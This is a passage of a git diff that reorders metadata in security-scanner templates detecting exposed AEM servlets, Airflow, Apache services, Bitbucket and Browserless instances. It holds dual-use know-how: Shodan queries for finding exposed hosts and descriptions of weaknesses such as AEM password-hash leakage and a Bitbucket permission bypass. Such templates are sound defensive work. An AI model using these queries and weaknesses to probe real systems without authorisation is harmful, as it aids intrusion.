490a0046304402206193866bf0dd434662189198c5055f732162d34385c7367eeb2ae0e01bfa7c280220313b031c5d09c5ee1b46c97a0f6030379d2964a722e2c6765a265e3232d6cd87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-groovyconsole.yaml b/http/misconfiguration/aem/aem-groovyconsole.yaml index f9563e0c1b..02b1ceb7bf 100644 --- a/http/misconfiguration/aem/aem-groovyconsole.yaml +++ b/http/misconfiguration/aem/aem-groovyconsole.yaml @@ -8,15 +8,15 @@ info: reference: - https://hackerone.com/reports/672243 - https://twitter.com/XHackerx007/status/1435139576314671105 - metadata: - max-request: 2 - shodan-query: http.component:"Adobe Experience Manager" - product: experience_manager_cloud_service - vendor: adobe - tags: aem,adobe,hackerone,misconfig - classification: cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: adobe + product: experience_manager_cloud_service + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,adobe,hackerone,misconfig + http: - method: GET path: @@ -42,4 +42,4 @@ http: status: - 200 -# digest: 4a0a00473045022043264a058b3f40cbb321ac1f9acaea06487cca638c087673eb48026c5fd0357c022100c4f8b8138448c20109589a47d17deb0ed23d8cd236ae29842aeb545dc53a9d07:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022043264a058b3f40cbb321ac1f9acaea06487cca638c087673eb48026c5fd0357c022100c4f8b8138448c20109589a47d17deb0ed23d8cd236ae29842aeb545dc53a9d07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-hash-querybuilder.yaml b/http/misconfiguration/aem/aem-hash-querybuilder.yaml index 4d86b0cde4..eb3ce0132e 100644 --- a/http/misconfiguration/aem/aem-hash-querybuilder.yaml +++ b/http/misconfiguration/aem/aem-hash-querybuilder.yaml @@ -7,15 +7,15 @@ info: description: AEM hased password can be queried via QueryBuilder Servlet. reference: - https://twitter.com/AEMSecurity/status/1372392101829349376 - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - product: acs_aem_commons - vendor: adobe - tags: aem,misconfig - classification: cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: adobe + product: acs_aem_commons + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,misconfig + http: - raw: - | @@ -36,4 +36,5 @@ http: - '"success":true' - 'rep:password' condition: and -# digest: 4a0a00473045022100cb28ec85d528c4df5d807eecd666a91bd49b19e18ff697ba4d64930ae863334702202d6c99658248b15ba8e8c6ea8571dda1d95e41b9f6e4ea28bb30fdfad88520d7:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100cb28ec85d528c4df5d807eecd666a91bd49b19e18ff697ba4d64930ae863334702202d6c99658248b15ba8e8c6ea8571dda1d95e41b9f6e4ea28bb30fdfad88520d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-login-status.yaml b/http/misconfiguration/aem/aem-login-status.yaml index 7ee77f1aaa..39c95e93fc 100644 --- a/http/misconfiguration/aem/aem-login-status.yaml +++ b/http/misconfiguration/aem/aem-login-status.yaml @@ -8,15 +8,15 @@ info: reference: - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/LoginStatusServletExposed.java - metadata: - max-request: 3 - shodan-query: http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe - tags: aem,adobe,misconfig - classification: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: adobe + product: experience_manager + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,adobe,misconfig + http: - method: GET path: @@ -36,4 +36,4 @@ http: words: - 'CREDENTIAL_CHALLENGE' -# digest: 4a0a0047304502203d588dfb867f6570608796de1e9e4fd6377b9423f492dcc6166121425133a35a022100a854db9f3c2f05923fb27a7ec79de8428a1164b62a07806c77b94f0ec83abf47:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203d588dfb867f6570608796de1e9e4fd6377b9423f492dcc6166121425133a35a022100a854db9f3c2f05923fb27a7ec79de8428a1164b62a07806c77b94f0ec83abf47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml index ff7cde4e5a..efa0b0084a 100644 --- a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml +++ b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml @@ -6,15 +6,15 @@ info: severity: info reference: - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe - tags: aem,misconfig - classification: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: adobe + product: experience_manager + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,misconfig + http: - method: GET path: @@ -31,4 +31,4 @@ http: - 'assetPaths' condition: and -# digest: 4a0a0047304502204c5922229b04b36c72ca391555bf2cbb57bca10d36b6281cd4d4f7677fc222fa022100b04f9edf21b17af0df74d22e4d9de9706c52fe5a1e4ab6ef1d0f725d81bb0c7c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204c5922229b04b36c72ca391555bf2cbb57bca10d36b6281cd4d4f7677fc222fa022100b04f9edf21b17af0df74d22e4d9de9706c52fe5a1e4ab6ef1d0f725d81bb0c7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-offloading-browser.yaml b/http/misconfiguration/aem/aem-offloading-browser.yaml index feed7799c9..cd86112bf0 100644 --- a/http/misconfiguration/aem/aem-offloading-browser.yaml +++ b/http/misconfiguration/aem/aem-offloading-browser.yaml @@ -7,17 +7,17 @@ info: description: Adobe AEM Offloading Browser is exposed. reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe + product: acs_aem_commons shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: acs_aem_commons - vendor: adobe tags: misconfig,aem,adobe - classification: - cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ed6f741d37fa078e6e94ee682b0ae460d82c9020ba655b55652381d0726cbdfd022100857d459aacb53af935255af6cfd652e284b92f792b54557cab7c13f6ba0962bc:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100ed6f741d37fa078e6e94ee682b0ae460d82c9020ba655b55652381d0726cbdfd022100857d459aacb53af935255af6cfd652e284b92f792b54557cab7c13f6ba0962bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-osgi-bundles.yaml b/http/misconfiguration/aem/aem-osgi-bundles.yaml index c5967a06b0..0bd3b538a4 100644 --- a/http/misconfiguration/aem/aem-osgi-bundles.yaml +++ b/http/misconfiguration/aem/aem-osgi-bundles.yaml @@ -7,17 +7,17 @@ info: description: Adobe AEM Installed OSGI Bundles leaked. reference: - https://www.slideshare.net/0ang3el/hacking-aem-sites + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe + product: acs_aem_commons shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: acs_aem_commons - vendor: adobe tags: misconfig,aem,adobe - classification: - cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204e2d865541ec98c031958ea17a246e62f591878eb7937454afc7613d6eea1b29022054b04763a304b494c9a7d0314f70dfe6aadbb9251da3b120c0390cc3b841ebf4:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402204e2d865541ec98c031958ea17a246e62f591878eb7937454afc7613d6eea1b29022054b04763a304b494c9a7d0314f70dfe6aadbb9251da3b120c0390cc3b841ebf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml index be1a4d779a..8fb7238c7b 100644 --- a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml @@ -7,15 +7,15 @@ info: description: AEM QueryBuilder is vulnerable to LFI. reference: - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - metadata: - max-request: 4 - shodan-query: http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe - tags: aem,misconfig - classification: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 4 + vendor: adobe + product: experience_manager + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,misconfig + http: - method: GET path: @@ -37,4 +37,5 @@ http: - 'jcr:path' - 'success' condition: and -# digest: 4b0a00483046022100f6628f96cb4d633f700b66bc68bbff50e14437f1a7206af406d989d8e89b4943022100a70d967a5e148a69a9c18bdf1374c0f56e87283969a4ddc38eb81b9aa0af0421:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100f6628f96cb4d633f700b66bc68bbff50e14437f1a7206af406d989d8e89b4943022100a70d967a5e148a69a9c18bdf1374c0f56e87283969a4ddc38eb81b9aa0af0421:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml index 7168c38401..23fbf88cf0 100644 --- a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml @@ -8,15 +8,15 @@ info: reference: - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java - metadata: - max-request: 8 - shodan-query: http.component:"Adobe Experience Manager" - product: acs_aem_commons - vendor: adobe - tags: aem,adobe,misconfig - classification: cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* + metadata: + max-request: 8 + vendor: adobe + product: acs_aem_commons + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,adobe,misconfig + http: - method: GET path: @@ -48,4 +48,4 @@ http: - 'results' condition: and -# digest: 4a0a0047304502204622302d04c231f0e4e19c2e6650543f67b89b1a7180c14152a8a7cf2a5df1840221008db0ae31dbc522068081204274dd5abda67092d0569caf27d2385b8bb0ed7b62:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204622302d04c231f0e4e19c2e6650543f67b89b1a7180c14152a8a7cf2a5df1840221008db0ae31dbc522068081204274dd5abda67092d0569caf27d2385b8bb0ed7b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-sling-userinfo.yaml b/http/misconfiguration/aem/aem-sling-userinfo.yaml index a0be433ec3..92134d13bd 100644 --- a/http/misconfiguration/aem/aem-sling-userinfo.yaml +++ b/http/misconfiguration/aem/aem-sling-userinfo.yaml @@ -6,17 +6,17 @@ info: severity: info reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: adobe + product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe tags: misconfig,aem,adobe,exposure - classification: - cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,4 @@ http: status: - 200 -# digest: 4a0a0047304502207b30d574d41fcb3e94ffe0212c94de9f2dc48edf9d9867a2461eeab786b7ef29022100c3a1aed74a1cb0fbd045174687716d20d66fe12ea1d307424fa3456a536fa587:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207b30d574d41fcb3e94ffe0212c94de9f2dc48edf9d9867a2461eeab786b7ef29022100c3a1aed74a1cb0fbd045174687716d20d66fe12ea1d307424fa3456a536fa587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-userinfo-servlet.yaml b/http/misconfiguration/aem/aem-userinfo-servlet.yaml index 5b2f20e2b4..8187bcf9cd 100644 --- a/http/misconfiguration/aem/aem-userinfo-servlet.yaml +++ b/http/misconfiguration/aem/aem-userinfo-servlet.yaml @@ -5,15 +5,15 @@ info: author: DhiyaneshDk severity: info description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node." - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe - tags: aem,misconfig - classification: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: adobe + product: experience_manager + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,misconfig + http: - method: GET path: @@ -36,4 +36,5 @@ http: part: header words: - 'application/json' -# digest: 4b0a00483046022100cafd612968a71e2c99dc57d80e19456e1651f3661fb078df3ffbf5c1e3527aa90221009d782891fce13e73a531815ef5c121a3afa614c8a49be98820317d8f01ff0adb:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100cafd612968a71e2c99dc57d80e19456e1651f3661fb078df3ffbf5c1e3527aa90221009d782891fce13e73a531815ef5c121a3afa614c8a49be98820317d8f01ff0adb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/airflow/airflow-debug.yaml b/http/misconfiguration/airflow/airflow-debug.yaml index 0136ee583f..7acb858e58 100644 --- a/http/misconfiguration/airflow/airflow-debug.yaml +++ b/http/misconfiguration/airflow/airflow-debug.yaml @@ -5,16 +5,16 @@ info: author: pdteam severity: low description: Airflow Debug Trace enabled. + classification: + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Airflow - DAGs" - product: airflow vendor: apache + product: airflow + shodan-query: title:"Airflow - DAGs" tags: apache,airflow,fpd,misconfig - classification: - cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100b07309b0cbd96d505399c9c82239f762478a3023c1e8556e3e6d773d6afd1416022012c8681190e9080dab6e8fb7278dd01ea443ade8c3845cd3550bda5352584ae9:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100b07309b0cbd96d505399c9c82239f762478a3023c1e8556e3e6d773d6afd1416022012c8681190e9080dab6e8fb7278dd01ea443ade8c3845cd3550bda5352584ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/airflow/unauthenticated-airflow.yaml b/http/misconfiguration/airflow/unauthenticated-airflow.yaml index de72e5617c..24cb711896 100644 --- a/http/misconfiguration/airflow/unauthenticated-airflow.yaml +++ b/http/misconfiguration/airflow/unauthenticated-airflow.yaml @@ -5,15 +5,15 @@ info: author: dhiyaneshDK severity: high description: Airflow Instance is exposed. - metadata: - max-request: 2 - shodan-query: title:"Airflow - DAGs" - product: airflow - vendor: apache - tags: apache,airflow,unauth,misconfig - classification: cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: airflow + shodan-query: title:"Airflow - DAGs" + tags: apache,airflow,unauth,misconfig + http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402203f67cdf6f889648d2b9868d0ae6fd9171a87f9ca6e81af9475bd589420897c0602204c41171087e3d9a6ec9545451f3c7f2323d355b529dabda81886328ec356efe3:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402203f67cdf6f889648d2b9868d0ae6fd9171a87f9ca6e81af9475bd589420897c0602204c41171087e3d9a6ec9545451f3c7f2323d355b529dabda81886328ec356efe3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/ampache-update-exposure.yaml b/http/misconfiguration/ampache-update-exposure.yaml index 3d7180231f..fa245955e5 100644 --- a/http/misconfiguration/ampache-update-exposure.yaml +++ b/http/misconfiguration/ampache-update-exposure.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: low description: Ampache update page is exposed. + classification: + cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"Ampache Update" - product: ampache vendor: ampache + product: ampache + shodan-query: http.html:"Ampache Update" tags: misconfig,ampache,exposure - classification: - cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008c0739e4fd795e10d4e26b6443d2e7aaaca3f7a319581604454da0b81291e1da0220044cbd8795a1b1cae54923ff98d84c81e7d7aceb029169ab143825e7caa870f6:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221008c0739e4fd795e10d4e26b6443d2e7aaaca3f7a319581604454da0b81291e1da0220044cbd8795a1b1cae54923ff98d84c81e7d7aceb029169ab143825e7caa870f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/apache-drill-exposure.yaml b/http/misconfiguration/apache-drill-exposure.yaml index c6389ee8ac..3c8a7a5870 100644 --- a/http/misconfiguration/apache-drill-exposure.yaml +++ b/http/misconfiguration/apache-drill-exposure.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: low description: Apache Drill is exposed. + classification: + cpe: cpe:2.3:a:apache:drill:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Apache Drill" - product: drill vendor: apache + product: drill + shodan-query: title:"Apache Drill" tags: misconfig,exposure,apache,drill - classification: - cpe: cpe:2.3:a:apache:drill:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022030a4b7d4ffd3e534e720562827eace6ff4cd882b42ea16bfc4f29e2acf204f03022100cc67ba72b9d427ec1d39676424f61bbca5cff7ad1cae2c5e09535a4d04f519d0:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022030a4b7d4ffd3e534e720562827eace6ff4cd882b42ea16bfc4f29e2acf204f03022100cc67ba72b9d427ec1d39676424f61bbca5cff7ad1cae2c5e09535a4d04f519d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/apache-druid-unauth.yaml b/http/misconfiguration/apache-druid-unauth.yaml index b4574d9942..f7f67c5439 100644 --- a/http/misconfiguration/apache-druid-unauth.yaml +++ b/http/misconfiguration/apache-druid-unauth.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: low description: Apache Druid is exposed to external users. + classification: + cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Apache Druid" - product: druid vendor: apache + product: druid + shodan-query: title:"Apache Druid" tags: misconfig,druid,unauth,apache - classification: - cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032410ebe88dff06244ecd5348b0e4a3340bcc6cbab1c26d061e3231e039f3e610221009adb943521d59e4485ab6d9a04e2117e3db0c6dae660a5ff0aa31213e9b83d97:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022032410ebe88dff06244ecd5348b0e4a3340bcc6cbab1c26d061e3231e039f3e610221009adb943521d59e4485ab6d9a04e2117e3db0c6dae660a5ff0aa31213e9b83d97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/apache-impala.yaml b/http/misconfiguration/apache-impala.yaml index 2d7735ca8f..009c58aadd 100644 --- a/http/misconfiguration/apache-impala.yaml +++ b/http/misconfiguration/apache-impala.yaml @@ -7,16 +7,16 @@ info: description: Apache Impala is exposed. reference: - https://www.facebook.com/photo/?fbid=627585602745296&set=pcb.627585619411961 + classification: + cpe: cpe:2.3:a:apache:impala:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:587330928 - product: impala vendor: apache + product: impala + shodan-query: http.favicon.hash:587330928 tags: misconfig,apache,impala - classification: - cpe: cpe:2.3:a:apache:impala:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201dc3cd253eed22c678589452bebea6692552bfa91a81c9467c9a5a82f1f8ecdd022100e382474589312820dc0673ff200915a390c42824a0a4ee59a86114f1b7a800b5:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502201dc3cd253eed22c678589452bebea6692552bfa91a81c9467c9a5a82f1f8ecdd022100e382474589312820dc0673ff200915a390c42824a0a4ee59a86114f1b7a800b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/apache-struts-showcase.yaml b/http/misconfiguration/apache-struts-showcase.yaml index aae3ce1b00..8c9a6c02fb 100644 --- a/http/misconfiguration/apache-struts-showcase.yaml +++ b/http/misconfiguration/apache-struts-showcase.yaml @@ -7,16 +7,16 @@ info: description: Apache Structs ShowCase Application is exposed. reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java + classification: + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"Struts2 Showcase" - product: struts vendor: apache + product: struts + shodan-query: title:"Struts2 Showcase" tags: apache,struts,showcase,misconfig,exposure - classification: - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd7f7b423bdd7d05868d8f1d47733eb40b471785b26564871538af7feb86839f022043022c33d92e6e55425a6b5e0066b736116a66816970b6d9c28d4f4731010799:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100bd7f7b423bdd7d05868d8f1d47733eb40b471785b26564871538af7feb86839f022043022c33d92e6e55425a6b5e0066b736116a66816970b6d9c28d4f4731010799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/apple-cups-exposure.yaml b/http/misconfiguration/apple-cups-exposure.yaml index fd93a69cb7..37e0c6fede 100644 --- a/http/misconfiguration/apple-cups-exposure.yaml +++ b/http/misconfiguration/apple-cups-exposure.yaml @@ -8,16 +8,16 @@ info: Apple CUPS Sources was exposed. reference: - https://github.com/apple/cups + classification: + cpe: cpe:2.3:a:apple:cups:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Home - CUPS" - product: cups vendor: apple + product: cups + shodan-query: html:"Home - CUPS" tags: apple,cups,exposure,misconfig - classification: - cpe: cpe:2.3:a:apple:cups:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d5acd38c88c7e860f27b1544c681398a343985c6f3c4adaa2d8fad232f5c9591022100e986b0836bdb5e42a5309d66374b8999766ff3ca6f568b2387e933f08ca34f9d:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100d5acd38c88c7e860f27b1544c681398a343985c6f3c4adaa2d8fad232f5c9591022100e986b0836bdb5e42a5309d66374b8999766ff3ca6f568b2387e933f08ca34f9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/atlassian-bamboo-build.yaml b/http/misconfiguration/atlassian-bamboo-build.yaml index 7719aa3af3..62c4e24a3b 100644 --- a/http/misconfiguration/atlassian-bamboo-build.yaml +++ b/http/misconfiguration/atlassian-bamboo-build.yaml @@ -4,16 +4,16 @@ info: name: Atlassian Bamboo Build Dashboard author: DhiyaneshDK severity: unknown + classification: + cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Build Dashboard - Atlassian Bamboo" - product: bamboo vendor: atlassian + product: bamboo + shodan-query: title:"Build Dashboard - Atlassian Bamboo" tags: misconfig,atlassian,bamboo - classification: - cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,4 @@ http: status: - 200 -# digest: 4a0a0047304502200efd94247b76255574cc32b50365f1821d561bf7b226cc1430091fcf6ba61770022100cbc16a88c5a70b05497ec2551205be3cf455ed23a7cf4d0a083226d1c34e8857:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200efd94247b76255574cc32b50365f1821d561bf7b226cc1430091fcf6ba61770022100cbc16a88c5a70b05497ec2551205be3cf455ed23a7cf4d0a083226d1c34e8857:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/bitbucket-auth-bypass.yaml b/http/misconfiguration/bitbucket-auth-bypass.yaml index 7da18fa121..6796d60ff3 100644 --- a/http/misconfiguration/bitbucket-auth-bypass.yaml +++ b/http/misconfiguration/bitbucket-auth-bypass.yaml @@ -8,17 +8,17 @@ info: There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:atlassian:bitbucket_data_center:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: atlassian + product: bitbucket_data_center shodan-query: title:"Log in - Bitbucket" fofa-query: title="Log in - Bitbucket" - product: bitbucket_data_center - vendor: atlassian tags: misconfig,atlassian,bitbucket,auth-bypass - classification: - cpe: cpe:2.3:a:atlassian:bitbucket_data_center:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,4 @@ http: status: - 200 -# digest: 4a0a0047304502201946e48b08668a0597ded653e54bb13c9963cbdb12f6346ec925a3e6e076ed1b022100a2f3c87d0283a2d813f657de5284441fcb2c45757e5892bac85dee2fbec0a7ed:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201946e48b08668a0597ded653e54bb13c9963cbdb12f6346ec925a3e6e076ed1b022100a2f3c87d0283a2d813f657de5284441fcb2c45757e5892bac85dee2fbec0a7ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/bitbucket-public-repository.yaml b/http/misconfiguration/bitbucket-public-repository.yaml index 54bcbb1121..5ea0fa39e2 100644 --- a/http/misconfiguration/bitbucket-public-repository.yaml +++ b/http/misconfiguration/bitbucket-public-repository.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: low description: Bitbucket Public Repository is exposed. + classification: + cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: http.component:"Bitbucket" - product: bitbucket vendor: atlassian + product: bitbucket + shodan-query: http.component:"Bitbucket" tags: misconfig,bitbucket - classification: - cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ef4ca6052fba249e81286a51927cb5134633b363ceb7519da7c8e92fc43b0b3d02207f22c712d50b529e3c282aa667c4092eaf94c91e94bb26430971d8e18b37a437:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100ef4ca6052fba249e81286a51927cb5134633b363ceb7519da7c8e92fc43b0b3d02207f22c712d50b529e3c282aa667c4092eaf94c91e94bb26430971d8e18b37a437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/browserless-debugger.yaml b/http/misconfiguration/browserless-debugger.yaml index f05fe793cc..ef778c61a8 100644 --- a/http/misconfiguration/browserless-debugger.yaml +++ b/http/misconfiguration/browserless-debugger.yaml @@ -7,15 +7,15 @@ info: description: Browserless instance can be used to make web requests. May worth checking /workspace for juicy files. reference: - https://docs.browserless.io/docs/docker.html#securing-your-instance - metadata: - max-request: 1 - shodan-query: http.title:"browserless debugger" - product: chrome - vendor: browserless - tags: browserless,unauth,debug,misconfig - classification: cpe: cpe:2.3:a:browserless:chrome:*:*:*:*:node.js:*:*:* + metadata: + max-request: 1 + vendor: browserless + product: chrome + shodan-query: http.title:"browserless debugger" + tags: browserless,unauth,debug,misconfig + http: - method: GET path: @@ -34,4 +34,4 @@ http: status: - 200 -# digest: 4b0a00483046022100fbc099737ef182029191e896b9806e610a162693a38bcbf4fabd84a3a064ce64022100cb27dd4e8aa539c21facd415d9a3d360e356988d5e4a4f33d57178e4d1602959:922c64590222798bb761d5b6d8e72950 +# digest: 